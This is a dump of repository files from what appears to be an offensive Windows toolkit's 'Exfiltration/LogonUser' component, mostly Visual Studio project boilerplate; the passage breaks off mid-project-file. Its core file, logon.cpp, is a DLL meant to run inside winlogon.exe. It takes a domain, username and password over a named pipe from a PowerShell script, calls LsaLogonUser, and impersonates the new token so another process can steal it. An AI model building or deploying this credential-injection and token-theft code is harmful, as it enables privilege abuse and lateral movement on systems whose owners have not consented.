<PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"LogonUser.cpp\" />\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"LogonUser.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt",
    "content": "========================================================================\n    CONSOLE APPLICATION : LogonUser Project Overview\n========================================================================\n\nAppWizard has created this LogonUser application for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your LogonUser application.\n\n\nLogonUser.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nLogonUser.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nLogonUser.cpp\n    This is the main application source file.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named LogonUser.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// LogonUser.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n#include <stdio.h>\n#include <tchar.h>\n#include <iostream>\n#include <string>\n#include <Windows.h>\n#include <NTSecAPI.h>\n\n\n\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/LogonUser.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 2012\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"logon\", \"logon\\logon.vcxproj\", \"{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Win32 = Debug|Win32\n\t\tDebug|x64 = Debug|x64\n\t\tRelease|Win32 = Release|Win32\n\t\tRelease|x64 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64\n\t\t{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32\n\t\t{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64\n\t\t{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt",
    "content": "========================================================================\n    DYNAMIC LINK LIBRARY : logon Project Overview\n========================================================================\n\nAppWizard has created this logon DLL for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your logon application.\n\n\nlogon.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nlogon.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nlogon.cpp\n    This is the main DLL source file.\n\n\tWhen created, this DLL does not export any symbols. As a result, it\n\twill not produce a .lib file when it is built. If you wish this project\n\tto be a project dependency of some other project, you will either need to\n\tadd code to export some symbols from the DLL so that an export library\n\twill be produced, or you can set the Ignore Input Library property to Yes\n\ton the General propert page of the Linker folder in the project's Property\n\tPages dialog box.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named logon.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp",
    "content": "// dllmain.cpp : Defines the entry point for the DLL application.\n#include \"stdafx.h\"\n\nBOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved\n\t\t\t\t\t )\n{\n\tswitch (ul_reason_for_call)\n\t{\n\tcase DLL_PROCESS_ATTACH:\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n\tcase DLL_PROCESS_DETACH:\n\t\tbreak;\n\t}\n\treturn TRUE;\n}\n\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/logon/logon.cpp",
    "content": "// logon.cpp : Defines the exported functions for the DLL application.\n//\n\n#include \"stdafx.h\"\n\nusing namespace std;\n\nsize_t wcsByteLen( const wchar_t* str );\nvoid InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );\nPVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);\nPVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);\nsize_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address);\nvoid WriteErrorToPipe(string errorMsg, HANDLE pipe);\n\nextern \"C\" __declspec( dllexport ) void VoidFunc();\n\n\n//The entire point of this code is to call LsaLogonUser from within winlogon.exe\nextern \"C\" __declspec( dllexport ) void VoidFunc()\n{\n\t//Open a pipe which will receive data from the PowerShell script.\n\tHANDLE pipe = CreateFile(L\"\\\\\\\\.\\\\pipe\\\\sqsvc\", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);\n\tif (pipe == INVALID_HANDLE_VALUE)\n\t{\n\t\treturn;\n\t}\n\n\tconst size_t strSize = 257;\n\tsize_t bytesToRead = strSize * sizeof(wchar_t) - sizeof(wchar_t);\n\twchar_t* domain = new wchar_t[strSize];\n\twchar_t* username = new wchar_t[strSize];\n\twchar_t* password = new wchar_t[strSize];\n\tDWORD bytesRead = 0;\n\n\tBOOL success = ReadFile(pipe, domain, bytesToRead, &bytesRead, NULL);\n\tif (!success)\n\t{\n\t\treturn;\n\t}\n\tdomain[bytesRead/2] = '\\0';\n\tbytesRead = 0;\n\n\tsuccess = ReadFile(pipe, username, bytesToRead, &bytesRead, NULL);\n\tif (!success)\n\t{\n\t\treturn;\n\t}\n\tusername[bytesRead/2] = '\\0';\n\tbytesRead = 0;\n\n\tsuccess = ReadFile(pipe, password, bytesToRead, &bytesRead, NULL);\n\tif (!success)\n\t{\n\t\treturn;\n\t}\n\tpassword[bytesRead/2] = '\\0';\n\tbytesRead = 0;\n\n\t//Get the logon type from the pipe\n\tUSHORT logonType = 10;\n\tsuccess = ReadFile(pipe, &logonType, 1, &bytesRead, NULL);\n\tif (!success)\n\t{\n\t\treturn;\n\t}\n\tbytesRead = 0;\n\n\t//Get the authentication package to use. 1 = Msv1_0, 2 = Kerberos\n\tUSHORT authPackageToUse = 0;\n\tsuccess = ReadFile(pipe, &authPackageToUse, 1, &bytesRead, NULL);\n\tif (!success)\n\t{\n\t\treturn;\n\t}\n\tbytesRead = 0;\n\n\t/////////////\n\t//Build the parameters to call LsaLogonUser with\n\t/////////////\n\n\t//Get a handle to LSA\n\tHANDLE hLSA = NULL;\n\tNTSTATUS status = LsaConnectUntrusted(&hLSA);\n\tif (status != 0)\n\t{\n\t\tstring errorMsg = \"Error calling LsaConnectUntrusted. Error code: \" + to_string(status);\n\t\tWriteErrorToPipe(errorMsg, pipe);\n\t\treturn;\n\t}\n\tif (hLSA == NULL)\n\t{\n\t\tstring errorMsg = \"hLSA (LSA handle) is NULL, this shouldn't ever happen.\";\n\t\tWriteErrorToPipe(errorMsg, pipe);\n\t\treturn;\n\t}\n\n\t//Build LsaLogonUser parameters\n\tLSA_STRING originName = {};\n\tchar originNameStr[] = \"\";\n\toriginName.Buffer = originNameStr;\n\toriginName.Length = (USHORT)0;\n\toriginName.MaximumLength = 0;\n\n\t//Build the authentication package parameter based on the auth package the powershell script specified to use\n\t//Also get the AuthenticationInformation\n\tchar* authPackageBuf = NULL;\n\tDWORD authBufferSize = 0;\n\tPVOID authBuffer = NULL;\n\tif (authPackageToUse == 1)\n\t{\n\t\tauthPackageBuf = MSV1_0_PACKAGE_NAME;\n\t\tauthBuffer = CreateNtlmLogonStructure(domain, username, password, &authBufferSize);\n\t}\n\telse if (authPackageToUse == 2)\n\t{\n\t\tauthPackageBuf = MICROSOFT_KERBEROS_NAME_A;\n\t\tauthBuffer = CreateKerbLogonStructure(domain, username, password, &authBufferSize);\n\t}\n\telse\n\t{\n\t\tstring errorMsg = \"Received an invalid auth package from the named pipe\";\n\t\tWriteErrorToPipe(errorMsg, pipe);\n\t\treturn;\n\t}\n\n\tULONG authPackage = 0;\n\tPLSA_STRING authPackageName = new LSA_STRING();\n\tauthPackageName->Buffer = authPackageBuf;\n\tauthPackageName->Length = (USHORT)strlen(authPackageBuf);\n\tauthPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);\n\tstatus = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);\n\tif (status != 0)\n\t{\n\t\tint winError = LsaNtStatusToWinError(status);\n\t\tstring errorMsg = \"Call to LsaLookupAuthenticationPackage failed. Error code: \" + to_string(winError);\n\t\tWriteErrorToPipe(errorMsg, pipe);\n\t\treturn;\n\t}\n\n\t//Get TokenSource\n\tHANDLE hProcess = GetCurrentProcess();//todo\n\tHANDLE procToken = NULL;\n\tsuccess = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);\n\tif (!success)\n\t{\n\t\tDWORD errorCode = GetLastError();\n\t\tstring errorMsg = \"Call to OpenProcessToken failed. Errorcode: \" + to_string(errorCode);\n\t\tWriteErrorToPipe(errorMsg, pipe);\n\t\treturn;\n\t}\n\n\tTOKEN_SOURCE tokenSource = {};\n\tDWORD realSize = 0;\n\tsuccess = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);\n\tif (!success)\n\t{\n\t\tstring errorMsg = \"Call to GetTokenInformation failed.\";\n\t\tWriteErrorToPipe(errorMsg, pipe);\n\t\treturn;\n\t}\n\n\t//Misc out parameters\n\tPVOID profileBuffer = NULL;\n\tULONG profileBufferSize = 0;\n\tLUID loginId;\n\tHANDLE token = NULL;\n\tQUOTA_LIMITS quotaLimits;\n\tNTSTATUS subStatus = 0;\n\n\t//Log on the user\n\tstatus = LsaLogonUser(hLSA, \n\t\t&originName, \n\t\tstatic_cast<SECURITY_LOGON_TYPE>(logonType), \n\t\tauthPackage, \n\t\tauthBuffer,\n\t\tauthBufferSize, \n\t\t0, \n\t\t&tokenSource, \n\t\t&profileBuffer,\n\t\t&profileBufferSize,\n\t\t&loginId,\n\t\t&token,\n\t\t&quotaLimits,\n\t\t&subStatus);\n\n\tif (status != 0)\n\t{\n\t\tNTSTATUS winError = LsaNtStatusToWinError(status);\n\t\tstring errorMsg = \"Error calling LsaLogonUser. Error code: \" + to_string(winError);\n\t\tWriteErrorToPipe(errorMsg, pipe);\n\t\treturn;\n\t}\n\n\t\n\t//Impersonate the token with the current thread so it can be kidnapped\n\tImpersonateLoggedOnUser(token);\n\n\t//Put the thread to sleep so it can be impersonated\n\tstring successMsg = \"Logon succeeded, impersonating the token so it can be kidnapped and starting an infinite loop with the thread.\";\n\tWriteErrorToPipe(successMsg, pipe);\n\tHANDLE permenantSleep = CreateMutex(NULL, false, NULL);\n\twhile(1)\n\t{\n\t\tSleep(MAXDWORD);\n\t}\n\n\treturn;\n}\n\n\nPVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)\n{\n\tsize_t wcharSize = sizeof(wchar_t);\n\n\tsize_t totalSize = sizeof(KERB_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);\n\tKERB_INTERACTIVE_LOGON* ntlmLogon = (PKERB_INTERACTIVE_LOGON)(new BYTE[totalSize]);\n\tsize_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(KERB_INTERACTIVE_LOGON);\n\n\tntlmLogon->MessageType = KerbInteractiveLogon;\n\twriteAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);\n\twriteAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);\n\twriteAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);\n\n\t*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.\n\treturn ntlmLogon;\n}\n\n\nPVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)\n{\n\tsize_t wcharSize = sizeof(wchar_t);\n\n\tsize_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);\n\tMSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);\n\tsize_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(MSV1_0_INTERACTIVE_LOGON);\n\n\tntlmLogon->MessageType = MsV1_0InteractiveLogon;\n\twriteAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);\n\twriteAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);\n\twriteAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);\n\n\t*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.\n\treturn ntlmLogon;\n}\n\n//Returns the amount of bytes written.\nsize_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address)\n{\n\tsize_t size = lstrlenW(str) * sizeof(wchar_t);\n\tuniStr->Length = (USHORT)size;\n\tuniStr->MaximumLength = (USHORT)size;\n\tuniStr->Buffer = (PWSTR)address;\n\tmemcpy(address, str, size);\n\treturn size;\n}\n\nvoid WriteErrorToPipe(string errorMsg, HANDLE pipe)\n{\n\tconst char* error = errorMsg.c_str();\n\tDWORD bytesWritten = 0;\n\tWriteFile(pipe, error, strlen(error),  &bytesWritten, NULL);\n}"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"12.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>logon</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v120</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v120</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v120</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v120</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      